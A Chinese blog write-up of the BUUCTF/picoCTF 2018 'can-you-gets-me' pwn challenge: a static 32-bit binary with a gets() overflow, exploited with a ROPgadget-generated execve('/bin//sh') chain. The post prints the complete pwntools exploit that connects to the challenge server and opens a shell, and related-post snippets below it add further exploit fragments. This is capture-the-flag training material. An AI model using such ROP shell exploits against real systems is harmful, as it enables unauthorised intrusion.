[BUUCTF]PWN——picoctf_2018_can_you_gets_me

最新推荐文章于 2024-02-04 20:00:06 发布
最新推荐文章于 2024-02-04 20:00:06 发布
阅读量708 收藏
点赞数
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/112951679
版权

picoctf_2018_can_you_gets_me

附件

步骤:

  1. 例行检查,32位,开启了nx
    在这里插入图片描述
  2. 本地试运行一下,看看大概的情况
    在这里插入图片描述
  3. 32位ida载入
    在这里插入图片描述
    一开始一看发现是简单的栈溢出,直接就准备用ret2libc的方法了,但是在我找plt表找put@plt的时候我傻了,没有,双击一下puts,发现找个puts是出题人自己写的函数
    在这里插入图片描述
    想起来了之前做到的一道题目inndy_rop,那题也是没法利用got表,所以利用了工具ROPgadget,它有一个功能,可以直接利用程序中的片段拼凑rop链,这边也尝试一下
ROPgadget --binary PicoCTF_2018_can-you-gets-me  --ropchain

看到这边直接给我们构造好了rop攻击链,只要自己加一下偏移去利用溢出即可
在这里插入图片描述
完整exp

from pwn import *
from struct import pack

p = remote('node3.buuoj.cn',29956)
# p = process("./PicoCTF_2018_can-you-gets-me")


def payload():
	offset = 0x18
	p = 'A' * (offset + 4)
	p += pack('<I', 0x0806f02a) # pop edx ; ret
	p += pack('<I', 0x080ea060) # @ .data
	p += pack('<I', 0x080b81c6) # pop eax ; ret
	p += b'/bin'
	p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x0806f02a) # pop edx ; ret
	p += pack('<I', 0x080ea064) # @ .data + 4
	p += pack('<I', 0x080b81c6) # pop eax ; ret
	p += b'//sh'
	p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x0806f02a) # pop edx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8
	p += pack('<I', 0x08049303) # xor eax, eax ; ret
	p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x080481c9) # pop ebx ; ret
	p += pack('<I', 0x080ea060) # @ .data
	p += pack('<I', 0x080de955) # pop ecx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8
	p += pack('<I', 0x0806f02a) # pop edx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8
	p += pack('<I', 0x08049303) # xor eax, eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0806cc25) # int 0x80
	return p

shell = payload()
p.send(shell)
p.interactive()

在这里插入图片描述

Angel~Yan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BUUCTF-pwn]——picoctf_2018_can_you_gets_me
Y_peak的博客
02-24 381
[BUUCTF-pwn]——picoctf_2018_can_you_gets_me 题目地址:https://buuoj.cn/challenges#picoctf_2018_can_you_gets_me 通过这道题又学到了一个知识点。ROPgadget构造rop链 还是先checksec一下 在IDA中,查看一下。有gets栈溢出,又有puts函数。想当然的我们想到,通过puts函数,leek出一个got表地址,找到libc的栈基址,进而找到system函数和’/bin/sh’ 尝试过后你会
picoctf_2018_can_you_gets_me
qq_62887641的博客
10-01 146
32位,只开了NX拿到这么大的程序,直接ROPchain看看果不其然然后去ida看看溢出点秒了。
[BUUCTF]-PWN:picoctf_2018_can_you_gets_me解析(系统调用,自己编写shellcode)
最新发布
2301_79326813的博客
02-04 440
先看保护再看ida有一个不限长度的输入点gets,那能干的就很多了。通俗易懂的思路有以下两种。
非常规情况下栈溢出系统调用——PicoCTF_2018_can-you-gets-me
PLpa的博客
08-04 486
前言: 对于这种非常规的栈溢出题目,我自己也是见的比较少,故写此博客记录一下。 解题思路 查看保护 只开了NX保护的32位程序,如果是常规题的话,应该是非常容易做的。 进入IDA查看伪代码 打开IDA,如果是第一次见这种题目就会傻眼了。 题目中的每一个函数都好像是自己写的,那么我们就不能利用got表来泄露函数地址来getshell了。 题目开了NX保护,我们不能写shellcode,常规的ROP又利用不了,我们就完全利用不了libc里边的函数了。 乍一看,好像没什么办法了,但是我们可以用程序中非常多的g
持续更新 BUUCTF——PWN(二)
weixin_41748164的博客
12-14 385
buuctf pwn 第三页
PicoCTF-2019-WirteUp
Zichel77的博客
11-25 1387
1. 2Warm-General Skills 直接将十进制转化为二进制 picoCTF{101010} 2. Insp3ct0r-Web Exploitation https://2019shell1.picoctf.com/problem/63975/ 点击链接看到如下页面 点击What没有变化,点击How出现如下页面 说明是分别从HTML,CS...
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
在电子设计自动化(EDA)领域,Verilog HDL是一种广泛使用的硬件描述语言,用于描述数字逻辑系统,包括微处理器、接口电路以及各种嵌入式系统。本教程将深入探讨如何利用Verilog HDL实现脉冲宽度调制(PWM)。...
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
在ARM7处理器上实现PWM接口,需要理解ARM7架构、汇编语言以及PWN的具体工作原理。 ARM7是ARM公司设计的一系列32位RISC微处理器,以其低功耗、高性能和广泛应用而闻名。在ARM7处理器中,开发者可以使用C语言或汇编...
mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7
09-23
标题中的"mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7"暗示我们正在讨论一个用Verilog编写的PWM(脉冲宽度调制)信号发生器,其特性包括4位的分辨率,可能是通过4个D触发器(D Flip-flops)来实现的。...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF SROP UAF House of Force 修改free_got为system 静态链接
carol2358的博客
07-12 456
ciscn_2019_es_7 ciscn_2019_es_7 贴张表: ip是接下去要干的,sp是这里干完接下来要干的地址(大概XD) 怎么找binsh看我之前这篇: https://blog.csdn.net/carol2358/article/details/105643009 rsi 当然直接调试找也是可以的 exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_es_7' loca
BUU刷题 ROPgadget直接拼凑,off by one,overlapping,fastbin attack uaf system参数截断 data段覆盖指针
carol2358的博客
06-27 722
考完了,我活了。 这题ida里看着特别复杂,但其实就一个gets 静态编译: ida看起来特复杂,就是静态编译的结果。静态编译就不会调用libc中的东西,所以我们也不存在泄露版本利用libc的函数了。 https://www.cnblogs.com/bhxdn/p/12347296.html 直接 ROPgadget --binary rop --ropchain from pwn import * from struct import pack #r = process('./inndy_rop
攻防世界-pwn pwn-100(ROP)
菜的只能随便写写博客
11-05 2940
此题是LCTF 2016年的pwn100 参考文章:https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=42933&ctid=157 0x01 文件分析 64位elf 无stack 无PIE   0x02 运行分析  看起来像一个无限循环,不断接收输入。   0x03 静态分析 main: sub_40068E: ...
Pwn】NCTF2019 easy_heap
Nothing
11-29 560
查看程序保护。 分析程序,漏洞在free之后指针没置0,导致uaf;堆的分配大小做了限制0x50该变量在bss段上,刚好bss段上存放了用户名信息,所以先考虑在bss上伪造堆块,进行一次fastbinattack,分配到bss段,修改限制大小,去掉限制之后就是常规操作了,unsortbin泄露libc,再进行一次fastbinattack,getshell。 from pwn import * ...
[BJDCTF 2nd]secret&&inndy_rop
、moddemod
07-20 487
[BJDCTF 2nd]secret exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './secret' p = process(proc_name) # p = remote('node3.buuoj.cn', 28831)
[BUUCTF-pwn]——inndy_rop
Y_peak的博客
03-18 337
[BUUCTF-pwn]——inndy_rop main函数无法反汇编,不过还好,里面的overflow就是gets函数,可以栈溢出。 因为懒得自己去构造rop链了,看看里面是否可以拼凑出系统的调用 里面有就省的我们自己写了 中间还找了半天错,我真是个笨蛋,以前一直用p 忘记和和构造系统调用的变量重复了,改为a就好了 exploit from pwn import * from struct import pack a = remote('node3.buuoj.cn',27139) # Padding
[BUUCTF]inndy_rop 杂谈、32位与64位系统调用、与思考
Tokameine的博客
09-07 529
总之先从题目开始看吧,是一道非常简单但却让我长见识的题...... int overflow() { char v1[12]; // [esp+Ch] [ebp-Ch] BYREF return gets(v1); } 明显的栈溢出,且程序基本没有特别的保护,正常构造rop链即可拿到shell 主要是想拓展一下系统调用与一个简单的获取ROP方法 ROPgadget --binary rop --ropchain ROP chain...
Nctf2019 pwn
doudoudedi
11-24 681
没啥好说的自己菜 就做了三个 hello_pwn 没啥好说了直接连 from pwn import * local=1 p=remote('139.129.76.65',50003) p.interactive() pwn me 100 years! (Ⅰ) 00截断然后直接覆盖 from pwn import * p=remote('139.129.76.65',50004) #p=proce...
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值